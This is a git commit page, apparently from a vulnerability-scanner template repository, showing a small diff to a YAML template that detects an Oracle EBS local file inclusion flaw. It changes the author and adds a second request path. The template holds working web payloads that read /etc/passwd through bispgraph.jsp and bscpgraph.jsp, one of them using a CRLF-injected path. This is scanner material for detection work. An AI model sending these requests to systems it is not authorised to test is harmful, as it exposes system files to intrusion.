Merge pull request #544 from darkc0d37/darkc0d3-branch

Add Oracle-EBS LFI
patch-1
bauthard 2020-10-08 03:51:46 +05:30 committed by GitHub
commit 1a256345d5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -2,14 +2,14 @@ id: oracle-ebs-bispgrapgh-file-read
info: info:
name: Oracle EBS Bispgraph File Access name: Oracle EBS Bispgraph File Access
author: "Alfie Njeru (@emenalf) - https://the-infosec.com" author: "@emenalf & @tirtha_mandal"
severity: critical severity: critical
description: todo
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
matchers: matchers:
- type: regex - type: regex